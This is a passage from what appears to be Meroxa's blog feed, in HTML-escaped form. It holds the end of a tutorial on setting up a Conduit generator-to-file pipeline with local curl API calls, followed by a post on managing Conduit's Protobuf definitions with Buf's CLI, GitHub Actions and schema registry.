  &lt;span class=&quot;token string-property property&quot;&gt;&quot;processorIds&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;createdAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2022-07-12T18:54:33.778965128Z&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;updatedAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2022-07-12T18:54:33.778965128Z&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Creating the generator source&lt;/h3&gt;
&lt;p&gt;Run the following command to add a generator source to the pipeline.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;curl -X POST &apos;http://localhost:8080/v1/connectors&apos; -d &apos;
{
  &quot;type&quot;: &quot;TYPE_SOURCE&quot;,
  &quot;plugin&quot;: &quot;builtin:generator&quot;,
  &quot;pipeline_id&quot;: &quot;93d11532-504f-4591-b7b6-c130a54043ac&quot;,
  &quot;config&quot;: {
    &quot;name&quot;: &quot;my-generator-source&quot;,
    &quot;settings&quot;: {
      &quot;format.type&quot;: &quot;structured&quot;,
      &quot;format.options&quot;: &quot;id:int,name:string,company:string,trial:bool&quot;,
      &quot;readTime&quot;: &quot;10ms&quot;,
      &quot;recordCount&quot;: &quot;5&quot;
    }
  }
}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let’s go over the configuration options for the generator source in this example (also described in the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator#configuration&quot;&gt;README&lt;/a&gt;):&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;format.type&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;format.options&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;These two parameters are both required and specify the contents of generated records. &lt;code class=&quot;language-text&quot;&gt;format.options&lt;/code&gt; has different meanings depending on &lt;code class=&quot;language-text&quot;&gt;format.type&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;format.type&lt;/code&gt; can be &lt;code class=&quot;language-text&quot;&gt;structured&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;raw&lt;/code&gt;, or &lt;code class=&quot;language-text&quot;&gt;file&lt;/code&gt;. If &lt;code class=&quot;language-text&quot;&gt;structured&lt;/code&gt; is used, records with structured payloads will be generated. In that case, &lt;code class=&quot;language-text&quot;&gt;format.options&lt;/code&gt; needs to be a list of name-type pairs, where the type can be one of &lt;code class=&quot;language-text&quot;&gt;int&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;string&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;time&lt;/code&gt;, or &lt;code class=&quot;language-text&quot;&gt;bool&lt;/code&gt;. The generator above will create records with structured payloads: an &lt;code class=&quot;language-text&quot;&gt;id&lt;/code&gt; field of type integer, a &lt;code class=&quot;language-text&quot;&gt;name&lt;/code&gt; field of type string, a &lt;code class=&quot;language-text&quot;&gt;company&lt;/code&gt; field (also a string), and a &lt;code class=&quot;language-text&quot;&gt;trial&lt;/code&gt; field of type boolean.&lt;/p&gt;
&lt;p&gt;The same is true when &lt;code class=&quot;language-text&quot;&gt;format.type&lt;/code&gt; is &lt;code class=&quot;language-text&quot;&gt;raw&lt;/code&gt;. The only difference is that the structs will be serialized as JSON strings and then converted to bytes.&lt;/p&gt;
&lt;p&gt;To use a file as the payload, we need to set &lt;code class=&quot;language-text&quot;&gt;format.type&lt;/code&gt; to &lt;code class=&quot;language-text&quot;&gt;file&lt;/code&gt;. &lt;code class=&quot;language-text&quot;&gt;format.options&lt;/code&gt; is then expected to be a file path.&lt;/p&gt;
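&lt;p&gt;To make the name-type pair syntax concrete, here is a small Go sketch that parses a &lt;code class=&quot;language-text&quot;&gt;format.options&lt;/code&gt; value. It is a hypothetical helper for illustration only, not the connector&apos;s own parser:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"strings"
)

// parseFormatOptions splits a format.options value such as
// "id:int,name:string" into field-name → type pairs. This is a sketch of
// how the option is shaped, not Conduit's actual implementation.
func parseFormatOptions(opts string) (map[string]string, error) {
	fields := map[string]string{}
	for _, pair := range strings.Split(opts, ",") {
		name, typ, ok := strings.Cut(pair, ":")
		if !ok {
			return nil, fmt.Errorf("malformed pair %q", pair)
		}
		fields[name] = typ
	}
	return fields, nil
}

func main() {
	fields, err := parseFormatOptions("id:int,name:string,company:string,trial:bool")
	if err != nil {
		panic(err)
	}
	fmt.Println(fields["id"], fields["trial"]) // int bool
}
```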
&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;readTime&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Simulates the time needed to read a record. In this example, a record will be read every 10 milliseconds.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;recordCount&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The number of records the generator will produce, or -1 for no limit. In our example, 5 records will be generated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;burst.sleepTime&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;burst.generateTime&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;These two options make it possible to simulate bursts. The connector sleeps for &lt;code class=&quot;language-text&quot;&gt;burst.sleepTime&lt;/code&gt; (not generating any records), then generates records for &lt;code class=&quot;language-text&quot;&gt;burst.generateTime&lt;/code&gt;, and then repeats the same cycle. The connector always starts with the sleeping phase. The cycles end when &lt;code class=&quot;language-text&quot;&gt;recordCount&lt;/code&gt; has been reached, or never (if &lt;code class=&quot;language-text&quot;&gt;recordCount&lt;/code&gt; is set to -1).&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;readTime&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1ms&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token string-property property&quot;&gt;&quot;burst.sleepTime&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;15s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token string-property property&quot;&gt;&quot;burst.generateTime&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;30s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token string-property property&quot;&gt;&quot;recordCount&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2000&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here, the connector will sleep for 15s and then generate records for the next 30s, with every record taking 1ms to generate. Once the 30s are over, the same cycle repeats. &lt;code class=&quot;language-text&quot;&gt;recordCount&lt;/code&gt; is set to 2000, meaning that the cycles will stop after 2000 records have been generated.&lt;/p&gt;
&lt;h3&gt;Creating the file destination&lt;/h3&gt;
&lt;p&gt;Now let’s create a place for all the generated records to be written to. We’ll configure a file destination:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;curl -X POST &apos;http://localhost:8080/v1/connectors&apos; -d &apos;
{
  &quot;type&quot;: &quot;TYPE_DESTINATION&quot;,
  &quot;plugin&quot;: &quot;builtin:file&quot;,
  &quot;pipeline_id&quot;: &quot;93d11532-504f-4591-b7b6-c130a54043ac&quot;,
  &quot;config&quot;: {
    &quot;name&quot;: &quot;my-file-destination&quot;,
    &quot;settings&quot;: {
      &quot;path&quot;: &quot;/home/conduitdev/projects/conduit/file-destination.txt&quot;
    }
  }
}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Starting the pipeline&lt;/h3&gt;
&lt;p&gt;Finally, let’s start the pipeline by executing the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;curl -X POST http://localhost:8080/v1/pipelines/93d11532-504f-4591-b7b6-c130a54043ac/start&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Checking the results&lt;/h3&gt;
&lt;p&gt;Since we’re generating only 5 records, and are simulating a 10-millisecond read time, we should be able to see the records in the destination pretty much instantaneously. If you check the contents of &lt;code class=&quot;language-text&quot;&gt;/home/conduitdev/projects/conduit/file-destination.txt&lt;/code&gt;, you should see something like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1562668947&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 2&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;554929334&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 2&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;691297882&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 4&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;234317840&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 4&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 5&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1564914498&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string 5&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That’s all it takes! If you have any questions, suggestions, or just generally want to talk about streaming data, feel free to start a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt; or have a conversation with us on &lt;a href=&quot;https://discord.meroxa.com&quot;&gt;Discord&lt;/a&gt;. And don’t forget to follow us on &lt;a href=&quot;https://twitter.com/ConduitIO&quot;&gt;Twitter&lt;/a&gt; if you aren’t already.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How Conduit uses Buf to work with Protobuf]]></title><description><![CDATA[We faced challenges with Protobuf, so we began looking for a resolution... enter Buf!]]></description><link>https://meroxa.com/blog/how-conduit-uses-buf-to-work-with-protobuf</link><guid isPermaLink="false">https://meroxa.com/blog/how-conduit-uses-buf-to-work-with-protobuf</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Thu, 07 Jul 2022 17:30:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt;, our Kafka Connect alternative written in Go, uses Protobuf on two fronts:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;To define the gRPC API,&lt;/li&gt;
&lt;li&gt;As the protocol for communicating with standalone connectors.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;However, we started facing challenges working with Protobuf that impacted our developer experience, so we began looking for ways to resolve these problems. Continue reading to learn more about the challenges we faced and how we resolved them with &lt;a href=&quot;https://buf.build/&quot;&gt;Buf&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;What is Protobuf?&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://developers.google.com/protocol-buffers&quot;&gt;Protobuf&lt;/a&gt; is shorthand for “protocol buffers”, a data format with an accompanying interface definition language. You can think of it as an alternative to XML or JSON, the difference being that the same data encoded with Protobuf generally results in a smaller memory footprint and better (de)serialization performance. Protobuf is commonly used as the data format in &lt;a href=&quot;https://grpc.io/&quot;&gt;gRPC&lt;/a&gt;.&lt;/p&gt;
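&lt;p&gt;For illustration, a minimal (and hypothetical) Protobuf definition looks like this; the compiler turns it into serialization code for your target language:&lt;/p&gt;

```protobuf
// example.proto: a hypothetical message definition for illustration.
syntax = "proto3";

package example.v1;

message User {
  int64  id      = 1;
  string name    = 2;
  string company = 3;
  bool   trial   = 4;
}
```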
&lt;h3&gt;Challenges working with Protobuf&lt;/h3&gt;
&lt;p&gt;While Protobuf solves a &lt;a href=&quot;https://developers.google.com/protocol-buffers/docs/overview#solve&quot;&gt;whole set of problems&lt;/a&gt;, it also introduces some challenges. These are the ones we ran into:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Managing Tools&lt;/strong&gt;: To use Protobuf, you need to write a &lt;code class=&quot;language-text&quot;&gt;.proto&lt;/code&gt; file that describes the data structure you intend to serialize. Once you have a Protobuf file, you can run the Protobuf compiler to generate code in any of the supported languages. This in turn means you need to make sure you have the correct version of the compiler, as well as the correct version of any plugins you might need. Managing these tools quickly becomes a problem when multiple developers are involved since they need to ensure their environments are configured the same way.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Managing Dependencies&lt;/strong&gt;: Protobuf files can import dependencies that need to be provided to the compiler at compile time. Developers are left on their own to figure out how to find existing Protobuf definitions, manage the dependencies, and ensure they are up to date.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Evolving the Schema&lt;/strong&gt;: Data structures evolve, and so do Protobuf files. When you need to change the data structures in a Protobuf file, there are &lt;a href=&quot;https://developers.google.com/protocol-buffers/docs/proto3#updating&quot;&gt;rules&lt;/a&gt; you have to follow to ensure the new schema is backwards compatible. These rules are not enforced and are easy to miss.&lt;/li&gt;
&lt;/ul&gt;
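&lt;p&gt;One such rule that is easy to miss: when you delete a field, its number (and name) must never be reused, or old serialized data can be misread. Protobuf&apos;s &lt;code class=&quot;language-text&quot;&gt;reserved&lt;/code&gt; keyword lets the compiler enforce this. A hypothetical example:&lt;/p&gt;

```protobuf
// A message that previously had a field "company" with number 3.
// Reserving the number and name makes the compiler reject any
// future attempt to reuse them.
message User {
  reserved 3;
  reserved "company";

  int64  id    = 1;
  string name  = 2;
  bool   trial = 4;
  string email = 5; // new fields always get fresh numbers
}
```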
&lt;h3&gt;What is Buf and how are we leveraging it?&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://buf.build/&quot;&gt;Buf&lt;/a&gt; is a set of tools that aim to alleviate the challenges when working with Protobuf. We leverage the following tools to solve the above problems when developing Conduit:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://buf.build/product/cli/&quot;&gt;Buf CLI&lt;/a&gt; comes with a built-in Protobuf compiler, a linter, breaking-change detection, and a formatter.&lt;/li&gt;
&lt;li&gt;Buf provides &lt;a href=&quot;https://docs.buf.build/ci-cd/github-actions&quot;&gt;Github Actions&lt;/a&gt; for setting up Buf, running the linter, detecting changes, and pushing Protobufs to their schema registry using the Github CI/CD system.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://buf.build/explore&quot;&gt;Buf Schema Registry&lt;/a&gt; is an online registry where you can push your Protobuf schemas. It automatically generates a nice UI for browsing your schema&apos;s documentation, makes the schema easily available for consumers to import as a dependency, and can even generate code so that consumers skip the compilation step entirely (currently only available for Go).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Conduit Connector Protocol&lt;/h3&gt;
&lt;p&gt;Conduit has the ability to run connectors as plugins that don’t have to be included in the Conduit binary. Standalone connectors are invoked by Conduit and run in their own process that communicates with Conduit through gRPC (see &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/architecture-decision-records/20220121-conduit-plugin-architecture.md&quot;&gt;this document&lt;/a&gt; for more information). The gRPC service definitions and data structures are defined in the Github repository &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-protocol&quot;&gt;ConduitIO/conduit-connector-protocol&lt;/a&gt;, which uses Buf to manage Protobuf definitions. Here we will describe how we structured our workflow.&lt;/p&gt;
&lt;h3&gt;CI Actions&lt;/h3&gt;
&lt;p&gt;We use Github Actions provided by Buf to lint our proto files, detect breaking changes, and upload them to the Buf Schema Registry. You can find the full workflow file &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-protocol/blob/main/.github/workflows/buf.yml&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let’s first look at the &lt;code class=&quot;language-text&quot;&gt;validate&lt;/code&gt; job that contains the first two steps.
First, we need to do some setup — we check out the repository (&lt;a href=&quot;https://github.com/actions/checkout&quot;&gt;actions/checkout&lt;/a&gt;) and install the latest Buf CLI (&lt;a href=&quot;https://github.com/bufbuild/buf-setup-action&quot;&gt;bufbuild/buf-setup-action&lt;/a&gt;). After that, we are ready to call the lint action (&lt;a href=&quot;https://github.com/bufbuild/buf-lint-action&quot;&gt;bufbuild/buf-lint-action&lt;/a&gt;) that ensures our proto files follow the defined style guide.&lt;/p&gt;
&lt;p&gt;After the lint is successful, we execute an action ensuring the new schema is backwards compatible with the old one. We achieve this by first fetching the main branch and executing the breaking action (&lt;a href=&quot;https://github.com/bufbuild/buf-breaking-action&quot;&gt;bufbuild/buf-breaking-action&lt;/a&gt;) against the current content of the main branch.&lt;/p&gt;
&lt;p&gt;If the &lt;code class=&quot;language-text&quot;&gt;validate&lt;/code&gt; job succeeds and the action is being executed on a commit to the main branch, then we trigger the job &lt;code class=&quot;language-text&quot;&gt;push&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;You’ll notice this job also starts with the checkout and Buf setup actions, followed by the push action (&lt;a href=&quot;https://github.com/bufbuild/buf-push-action&quot;&gt;bufbuild/buf-push-action&lt;/a&gt;) that takes a secret token to authenticate with the Buf Schema Registry and pushes the new Protobuf definitions.&lt;/p&gt;
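The linked buf.yml file is the authoritative version; as a rough, hand-written sketch of the shape described above (job and step wiring only, names and versions illustrative and possibly out of date), the two jobs could look like:

```yaml
# Illustrative sketch only — see the linked buf.yml for the real workflow.
name: buf
on: [push, pull_request]

jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: bufbuild/buf-setup-action@v1
      - uses: bufbuild/buf-lint-action@v1
      # Compare against the Protobuf definitions currently on main.
      - uses: bufbuild/buf-breaking-action@v1
        with:
          against: 'https://github.com/ConduitIO/conduit-connector-protocol.git#branch=main'

  push:
    needs: validate
    if: github.ref == 'refs/heads/main'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: bufbuild/buf-setup-action@v1
      - uses: bufbuild/buf-push-action@v1
        with:
          buf_token: ${{ secrets.BUF_TOKEN }}
```

Keeping the registry token in a repository secret is what lets individual developers avoid ever handling it locally.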
&lt;p&gt;These Github Actions result in a workflow that doesn’t rely on the developer having their local environment set up correctly, as the CI/CD is the single place where all Protobuf files are validated. Additionally, we don’t need to share secrets between developers, the CI/CD takes care of pushing schemas to the registry.&lt;/p&gt;
&lt;h3&gt;Schema Registry&lt;/h3&gt;
&lt;p&gt;We use the Buf Schema Registry to host the Protobuf definitions and get a UI for our &lt;a href=&quot;https://buf.build/conduitio/conduit-connector-protocol/docs/main:connector.v1&quot;&gt;docs&lt;/a&gt;. The registry also tracks old versions of the same schema file so anyone referencing an older version can keep using it or update to the new version using &lt;code class=&quot;language-text&quot;&gt;buf mod update&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Remote Code Generation&lt;/h3&gt;
&lt;p&gt;Pushing our Protobuf definitions to the Buf Schema Registry opens up the possibility of using &lt;a href=&quot;https://docs.buf.build/bsr/remote-generation/overview&quot;&gt;remote code generation&lt;/a&gt;. The registry will take care of generating the Go code for us and expose it as a Go module, ready to be imported. This feature allows us to entirely skip the manual compilation step and simply import the compiled code as a dependency.&lt;/p&gt;
&lt;p&gt;For instance, to fetch the latest Conduit connector protocol code we can invoke this command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;go get go.buf.build/protocolbuffers/go/conduitio/conduit-connector-protocol&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Every time we update the Protobuf definitions and push them to the registry, the code will be remotely generated and ready to be used in any dependent code.&lt;/p&gt;
&lt;h3&gt;Local Development&lt;/h3&gt;
&lt;p&gt;Our workflow heavily leans on hosted services like Github Actions and the Buf Schema Registry, so the natural question is: how can we do local development? The answer is the go mod &lt;a href=&quot;https://go.dev/ref/mod#go-mod-file-replace&quot;&gt;replace directive&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To switch to locally generated Protobuf code, we follow these steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;buf generate&lt;/code&gt; — executing this in the &lt;code class=&quot;language-text&quot;&gt;proto&lt;/code&gt; folder will compile the proto files and generate Go code locally in the &lt;code class=&quot;language-text&quot;&gt;internal&lt;/code&gt; folder&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go mod init github.com/conduitio/conduit-connector-protocol/internal&lt;/code&gt; — executing this in the &lt;code class=&quot;language-text&quot;&gt;internal&lt;/code&gt; folder will initialize a (temporary) Go module in the newly generated Go code&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go mod edit -replace go.buf.build/library/go-grpc/conduitio/conduit-connector-protocol=./internal&lt;/code&gt; — executing this at the root of the repository will replace any references to the remotely generated code with the locally generated code (similarly we can do this for other repositories that depend on remotely generated code)&lt;/li&gt;
&lt;/ul&gt;
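Put together, the three steps above form a short shell session. This transcript is a sketch (it assumes `buf generate` is configured to output into the repo-root `internal` folder, as the steps describe):

```shell
# 1. Compile the protos and generate Go code locally (run inside ./proto).
(cd proto && buf generate)

# 2. Initialize a temporary Go module around the generated code.
(cd internal && go mod init github.com/conduitio/conduit-connector-protocol/internal)

# 3. From the repository root, point references to the remotely
#    generated module at the local copy instead.
go mod edit -replace go.buf.build/library/go-grpc/conduitio/conduit-connector-protocol=./internal
```

Reverting is a matter of dropping the replace directive again with `go mod edit -dropreplace`.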
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://buf.build/&quot;&gt;Buf&lt;/a&gt; is a great tool that allows us to streamline the management of our Protobuf files, ensures we follow code guidelines, and prevents us from unknowingly introducing breaking changes. It solves these problems in an elegant way and enhances the developer experience.&lt;/p&gt;
